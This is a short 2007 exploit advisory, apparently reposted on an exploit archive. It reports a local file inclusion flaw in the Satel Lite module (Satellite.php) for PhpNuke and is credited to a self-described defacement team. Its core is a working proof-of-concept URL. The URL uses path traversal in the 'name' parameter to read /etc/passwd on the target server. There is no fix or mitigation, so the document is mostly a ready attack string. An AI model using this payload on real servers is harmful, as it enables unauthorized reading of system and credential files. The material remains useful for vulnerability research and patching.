Home / os / solaris

satel-lfi.txt

Posted on 27 March 2007

+-------------------------------------------------------------------- + + Satel Lite for PhpNuke (Satellite.php) <= Local File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: NUke Satel lite + Class .............: LoCal File Inclusion + Risk ..............: high (LoCal File Execution) + Found by ..........: rUnViRuS + Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + PoC: + +http://www.example.com/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index + + +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE || + || Pro Hacker || - || DARKFIRE || + +-------------------------[ W D T ]----------------------------------

 

TOP